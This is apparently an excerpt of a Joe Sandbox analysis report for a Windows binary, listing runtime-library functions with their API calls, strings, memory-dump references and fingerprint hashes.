std::_Facet_Register.LIBCPMT ref: 000000018001DF71
std::_Lockit::~_Lockit.LIBCPMT ref: 000000018001DF8B
Concurrency::cancel_current_task.LIBCPMT ref: 000000018001DFB3

Strings

ios_base::failbit set, xrefs: 000000018001E32C
ios_base::eofbit set, xrefs: 000000018001E333
ios_base::badbit set, xrefs: 000000018001E320

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2081738530-1866435925
Opcode ID: fe2dff3e7257411eeb718cb910f515557502164b003b50ceb170d07275cadf33
Instruction ID: 2523c80cbc47b4b34d4dc1cdce44052bca2059f00e8d79b31184f7a574188db0
Opcode Fuzzy Hash: fe2dff3e7257411eeb718cb910f515557502164b003b50ceb170d07275cadf33
Instruction Fuzzy Hash: 37F17F32205A8882EB92DF15E4903AD77A1F789BD4F19C126EE5E477A5DF39C649C300

Function 00007FF6B40A3C74 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 137fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FF6B40A3ED0,?,?,?,?,00007FF6B40A5D5D,?,?,00000000,00007FF6B40A6748), ref: 00007FF6B40A3D37
GetStdHandle.KERNEL32(?,?,?,?,?,00007FF6B40A3ED0,?,?,?,?,00007FF6B40A5D5D,?,?,00000000,00007FF6B40A6748), ref: 00007FF6B40A3E43
WriteFile.KERNEL32 ref: 00007FF6B40A3E7D

Strings

..., xrefs: 00007FF6B40A3D9A
<program name unknown>, xrefs: 00007FF6B40A3D41
Runtime Error!Program: , xrefs: 00007FF6B40A3CF6
Microsoft Visual C++ Runtime Library, xrefs: 00007FF6B40A3E27

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: 4274fdea0b6c7295828879ce95039c455bfb1d92aa9676850be9006e99b32c7d
Instruction ID: c00271db9bf22f0f39b3d183b13ff19641af7d05ad7722376d09916e2b6fbadb
Opcode Fuzzy Hash: 4274fdea0b6c7295828879ce95039c455bfb1d92aa9676850be9006e99b32c7d
Instruction Fuzzy Hash: 3B518B21F1864381FB24DF6DA9D57BA2291AF85384F84463AEF4DC6AD5CF3CE1058600

Function 0000000180024650 Relevance: 12.1, APIs: 8, Instructions: 110windowthreadCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0000000180024745
GetWindowRect.USER32 ref: 0000000180024753
CreateThread.KERNEL32 ref: 00000001800247CB
GetMessageW.USER32 ref: 00000001800247E3
TranslateMessage.USER32 ref: 00000001800247F5
DispatchMessageW.USER32 ref: 0000000180024800
GetMessageW.USER32 ref: 0000000180024813
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180024838

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Message$Window$CreateDesktopDispatchRectThreadTranslate_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1172204589-0
Opcode ID: 2ced1cf8f5283727fa1ec3389219ed8443c0280d24848f5b13016a1b9edfde56
Instruction ID: fe08b80cef5dae84b35fab9a411fe061834bb011c3313910144643e68a2c69dc
Opcode Fuzzy Hash: 2ced1cf8f5283727fa1ec3389219ed8443c0280d24848f5b13016a1b9edfde56
Instruction Fuzzy Hash: 69515272614B8882FB96CB28EC593DA2761BB8D7C4F40C116F699466A5DF7CC34CC700

Function 00007FF6B40A1840 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B40A828F,?,?,?,00000001,00000000,?,00000001), ref: 00007FF6B40A347F
RtlLookupFunctionEntry.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B40A828F,?,?,?,00000001,00000000,?,00000001), ref: 00007FF6B40A349E
RtlVirtualUnwind.KERNEL32 ref: 00007FF6B40A34EA
IsDebuggerPresent.KERNEL32 ref: 00007FF6B40A355C
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6B40A3574
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6B40A3581
GetCurrentProcess.KERNEL32 ref: 00007FF6B40A359A
TerminateProcess.KERNEL32 ref: 00007FF6B40A35A8

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
String ID:
API String ID: 3778485334-0
Opcode ID: df4c904b95edb140e82ec5dbc248f6949bb10163e2da0b5d37bc1614fb694f9f
Instruction ID: c5f0af00989538c32cc9dc602404bf593ebf4ff6b7b426eabf5e957ea4060971
Opcode Fuzzy Hash: df4c904b95edb140e82ec5dbc248f6949bb10163e2da0b5d37bc1614fb694f9f
Instruction Fuzzy Hash: CB31E235A09B8685EB50AF58F8C43AA77A0FF85754F904136DB8D82BA5DF7CE4488B04

Function 00007FFE1A52E268 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFE1A523544: GetLastError.KERNEL32 ref: 00007FFE1A523553
Part of subcall function 00007FFE1A523544: FlsGetValue.KERNEL32 ref: 00007FFE1A523568
Part of subcall function 00007FFE1A523544: SetLastError.KERNEL32 ref: 00007FFE1A5235F3

TranslateName.LIBCMT ref: 00007FFE1A52E2D2
TranslateName.LIBCMT ref: 00007FFE1A52E30D
GetACP.KERNEL32(?,?,?,00000000,00000092,00007FFE1A5240C8), ref: 00007FFE1A52E354
IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FFE1A5240C8), ref: 00007FFE1A52E38C
GetLocaleInfoW.KERNEL32 ref: 00007FFE1A52E549

Strings

utf8, xrefs: 00007FFE1A52E470

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
String ID: utf8
API String ID: 3069159798-905460609
Opcode ID: dee9d0ecdcf56047c7090e3f124df556c956d2ad25ce97b6e5f617c4598f202d
Instruction ID: ef15379dbb82b153d20df6d3c3229796f82b386cbf46db1c4aabc1dd9ff2455b
Opcode Fuzzy Hash: dee9d0ecdcf56047c7090e3f124df556c956d2ad25ce97b6e5f617c4598f202d
Instruction Fuzzy Hash: 0691BD62B0CB42C5EB249FA294112B92BA6AF96FA0F4441F3DE4C477A6DF3CE551D340

Function 000000018005A7A8 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018004B450: GetLastError.KERNEL32(?,?,?,000000018003F5B7,?,?,00000000,00000001800545B4), ref: 000000018004B45F
Part of subcall function 000000018004B450: SetLastError.KERNEL32(?,?,?,000000018003F5B7,?,?,00000000,00000001800545B4), ref: 000000018004B4FD

TranslateName.LIBCMT ref: 000000018005A815
TranslateName.LIBCMT ref: 000000018005A850
GetACP.KERNEL32(?,?,?,00000000,00000092,000000018004CE54), ref: 000000018005A895
IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,000000018004CE54), ref: 000000018005A8BD

Strings

utf8, xrefs: 000000018005A9A1

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: ErrorLastNameTranslate$CodePageValid
String ID: utf8
API String ID: 2136749100-905460609
Opcode ID: c45f6f27465481a6d9a7942fddfaf2a313355088946b95cb684bc624dda47b89
Instruction ID: 773f32e732f7436cba29ca358c5b86572f0454c1db811b2be752e3ecce37cfb6
Opcode Fuzzy Hash: c45f6f27465481a6d9a7942fddfaf2a313355088946b95cb684bc624dda47b89
Instruction Fuzzy Hash: D6919D32204B4886FBA69F21D4413E923A4E78EBC4F45C121FE5967786DF3ACB5AC741

Function 000000018005B1DC Relevance: 10.7, APIs: 7, Instructions: 171COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018004B450: GetLastError.KERNEL32(?,?,?,000000018003F5B7,?,?,00000000,00000001800545B4), ref: 000000018004B45F
Part of subcall function 000000018004B450: SetLastError.KERNEL32(?,?,?,000000018003F5B7,?,?,00000000,00000001800545B4), ref: 000000018004B4FD

EnumSystemLocalesW.KERNEL32(?,00000000,00000092,?,?,00000000,?,000000018004CE4D), ref: 000000018005B333
GetUserDefaultLCID.KERNEL32(?,00000000,00000092,?), ref: 000000018005B34C
ProcessCodePage.LIBCMT ref: 000000018005B376
IsValidCodePage.KERNEL32 ref: 000000018005B388
IsValidLocale.KERNEL32 ref: 000000018005B39E
GetLocaleInfoW.KERNEL32 ref: 000000018005B3FA
GetLocaleInfoW.KERNEL32 ref: 000000018005B416

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
String ID:
API String ID: 3939093798-0
Opcode ID: 0cc45c80fdb8500f5ea554e376e2acc69840886a38c9ec091eed4d8ee5e03d49
Instruction ID: a0422a69cdffac8ab54915a16f878b73e8e41145ccab6f6dcd110639d597ec77
Opcode Fuzzy Hash: 0cc45c80fdb8500f5ea554e376e2acc69840886a38c9ec091eed4d8ee5e03d49
Instruction Fuzzy Hash: 88718D327007488AFBA69F60D8517ED33B0BB4D788F488015BA19A77D5EF3AD689C350

Function 00007FFE1A52ECB0 Relevance: 10.7, APIs: 7, Instructions: 171COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFE1A523544: GetLastError.KERNEL32 ref: 00007FFE1A523553
Part of subcall function 00007FFE1A523544: FlsGetValue.KERNEL32 ref: 00007FFE1A523568
Part of subcall function 00007FFE1A523544: SetLastError.KERNEL32 ref: 00007FFE1A5235F3

Part of subcall function 00007FFE1A523544: FlsSetValue.KERNEL32 ref: 00007FFE1A523589

GetUserDefaultLCID.KERNEL32(?,00000000,00000092,?), ref: 00007FFE1A52EE20

Part of subcall function 00007FFE1A523544: FlsSetValue.KERNEL32 ref: 00007FFE1A5235B6
Part of subcall function 00007FFE1A523544: FlsSetValue.KERNEL32 ref: 00007FFE1A5235C7
Part of subcall function 00007FFE1A523544: FlsSetValue.KERNEL32 ref: 00007FFE1A5235D8

EnumSystemLocalesW.KERNEL32(?,00000000,00000092,?,?,00000000,?,00007FFE1A5240C1), ref: 00007FFE1A52EE07
ProcessCodePage.LIBCMT ref: 00007FFE1A52EE4A
IsValidCodePage.KERNEL32 ref: 00007FFE1A52EE5C
IsValidLocale.KERNEL32 ref: 00007FFE1A52EE72
GetLocaleInfoW.KERNEL32 ref: 00007FFE1A52EECE
GetLocaleInfoW.KERNEL32 ref: 00007FFE1A52EEEA

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
String ID:
API String ID: 2591520935-0
Opcode ID: 1efbc24b6cf28533a4c171f5bdbe43219c0bf55855eceee130b5a6f29cfbfb7e
Instruction ID: bf745d167d4dc86af226035a57d102eda56aa32353e1c3d212e0a95f0754b7d0
Opcode Fuzzy Hash: 1efbc24b6cf28533a4c171f5bdbe43219c0bf55855eceee130b5a6f29cfbfb7e
Instruction Fuzzy Hash: AF7160A2B0CE0285FB159BA2D8506FC2BA2AF46F64F4440F7DE1D576A5EF3CA845D310

Function 00007FF6B40A87A8 Relevance: 10.6, APIs: 7, Instructions: 138COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF6B40A87EE
_errno.LIBCMT ref: 00007FF6B40A885C
_errno.LIBCMT ref: 00007FF6B40A8867
_errno.LIBCMT ref: 00007FF6B40A889B
WideCharToMultiByte.KERNEL32 ref: 00007FF6B40A8936
GetLastError.KERNEL32 ref: 00007FF6B40A8956
_errno.LIBCMT ref: 00007FF6B40A897C

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: _errno$ByteCharErrorLastMultiWide
String ID:
API String ID: 3895584640-0
Opcode ID: 641700609f616320754a9ead5c3539e7a9ba94d9b60cbabe9bcc8da0e0702b07
Instruction ID: 2b6fd8d2ad232a12e4652a0a77ddbfbedd85d3574d090ce042a8c75a501e5ed8
Opcode Fuzzy Hash: 641700609f616320754a9ead5c3539e7a9ba94d9b60cbabe9bcc8da0e0702b07
Instruction Fuzzy Hash: 26517423E0C6824AEF709F6DE48167EB6A1BF84790F588135DB9D87AC5DE3CD4418B06

Function 0000000180039820 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000000018003983C
RtlCaptureContext.KERNEL32 ref: 0000000180039869
RtlLookupFunctionEntry.KERNEL32 ref: 0000000180039883
RtlVirtualUnwind.KERNEL32 ref: 00000001800398C4
IsDebuggerPresent.KERNEL32 ref: 0000000180039918
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000180039939
UnhandledExceptionFilter.KERNEL32 ref: 0000000180039944

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 7d461ceba35c5b2ea6832e74b5c8453ef6071ca909d2c67cae53307903e65652
Instruction ID: 0bb065e978d343306ab6e9c8e148889e68dbe7d5b05c5c8b871532122c8c504f
Opcode Fuzzy Hash: 7d461ceba35c5b2ea6832e74b5c8453ef6071ca909d2c67cae53307903e65652
Instruction Fuzzy Hash: EF315E72205B848AEBA58F60E8403DE7375F789788F45842AEA4E47B94EF38C74CC710

Function 00007FFE1A517ABC Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFE1A517AD8
RtlCaptureContext.KERNEL32 ref: 00007FFE1A517B05
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFE1A517B1F
RtlVirtualUnwind.KERNEL32 ref: 00007FFE1A517B60
IsDebuggerPresent.KERNEL32 ref: 00007FFE1A517BB4
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFE1A517BD1
UnhandledExceptionFilter.KERNEL32 ref: 00007FFE1A517BDC

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: c483f49b892514e908f988de2ba86b0dec3abeb64fe5ba5b26ff69276a732c87
Instruction ID: c330109d5a4ff517ed2037759bc349868c9f38d628d2a771254f989862c468f9
Opcode Fuzzy Hash: c483f49b892514e908f988de2ba86b0dec3abeb64fe5ba5b26ff69276a732c87
Instruction Fuzzy Hash: 09313D76709E8186EB608F65E8803FD7365FB85B58F4040BADA4D47BA9DF38D648C710

Function 00000001800502BC Relevance: 9.3, APIs: 6, Instructions: 280timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 0000000180050306

Part of subcall function 000000018004F9CC: _invalid_parameter_noinfo.LIBCMT ref: 000000018004F9E0

_get_daylight.LIBCMT ref: 00000001800502F5

Part of subcall function 000000018004FA2C: _invalid_parameter_noinfo.LIBCMT ref: 000000018004FA40

_get_daylight.LIBCMT ref: 000000018005057E
_get_daylight.LIBCMT ref: 000000018005058F
_get_daylight.LIBCMT ref: 00000001800505A0
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00000001800507AC), ref: 00000001800505C7

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
String ID:
API String ID: 435049134-0
Opcode ID: fb25a94d93b61d605942d4f8b5c5f7d0eed7eeb5a00c7969911240b287602eb0
Instruction ID: 9a2940319c077ddfe24e667115bda0062b6e5ccde3dd3b2f8ca393cf943da5cb
Opcode Fuzzy Hash: fb25a94d93b61d605942d4f8b5c5f7d0eed7eeb5a00c7969911240b287602eb0
Instruction Fuzzy Hash: 20B1F232700A4886F7A2EF22D8913EE6761FB8C7C8F51C125BA5947B95DF39C649C740

Function 0000000180042204 Relevance: 9.2, APIs: 6, Instructions: 224COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000000180042226
_get_daylight.LIBCMT ref: 0000000180042286
_get_daylight.LIBCMT ref: 0000000180042297
_get_daylight.LIBCMT ref: 00000001800422A8
_isindst.LIBCMT ref: 00000001800422F9
_isindst.LIBCMT ref: 000000018004234C

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
String ID:
API String ID: 1405656091-0
Opcode ID: 8620ecbc1c7f3f47583445b30867347c81d7ccd1478308ad77f8ce61ab00babe
Instruction ID: 161fcd0b21627b7731ac01798db371523c07c02e94ce2d93e72d62fa711e5099
Opcode Fuzzy Hash: 8620ecbc1c7f3f47583445b30867347c81d7ccd1478308ad77f8ce61ab00babe
Instruction Fuzzy Hash: 5481C9B27006498BEBA98F25C9813EC27A5F758BCCF45D125FA098A789EF38D645C704

Function 0000000180041394 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 000000018004140D
RtlLookupFunctionEntry.KERNEL32 ref: 0000000180041425
RtlVirtualUnwind.KERNEL32 ref: 0000000180041460
IsDebuggerPresent.KERNEL32 ref: 0000000180041499
SetUnhandledExceptionFilter.KERNEL32 ref: 00000001800414A3
UnhandledExceptionFilter.KERNEL32 ref: 00000001800414AE

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: ae16a8a3eb323bf3dd6fba5b1a7dcbc0fcf05a413481d8fe00c9e9dfdabd0640
Instruction ID: bccc34fceed6f10f4bc5db9959e39778bf66aa1bd5944092eeccf279ae3ea202
Opcode Fuzzy Hash: ae16a8a3eb323bf3dd6fba5b1a7dcbc0fcf05a413481d8fe00c9e9dfdabd0640
Instruction Fuzzy Hash: B4316032204F848AEBA1CF25E8803DE73A4F789798F554115FA9D47B94EF38C649CB40

Function 00007FFE1A51EB04 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FFE1A51EB7D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFE1A51EB95
RtlVirtualUnwind.KERNEL32 ref: 00007FFE1A51EBD0
IsDebuggerPresent.KERNEL32 ref: 00007FFE1A51EC09
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFE1A51EC13
UnhandledExceptionFilter.KERNEL32 ref: 00007FFE1A51EC1E

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 3f75ef5190547d953e74bd519a43e4978f960a3463810fc2b2d420cc4dce98aa
Instruction ID: be1e12b26664eb3fafcc27536fe9a035ac0652af95021fb0fa08dcded7302927
Opcode Fuzzy Hash: 3f75ef5190547d953e74bd519a43e4978f960a3463810fc2b2d420cc4dce98aa
Instruction Fuzzy Hash: A2315136708F8186D7608F26E8402BE77A5FB85B68F5001B6EA8D47BA9DF3CC545CB00

Function 00007FF6B40A31EC Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6B40A322B
IsDebuggerPresent.KERNEL32 ref: 00007FF6B40A32C9
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6B40A32D3
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6B40A32DE
GetCurrentProcess.KERNEL32 ref: 00007FF6B40A32F4
TerminateProcess.KERNEL32 ref: 00007FF6B40A3302

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
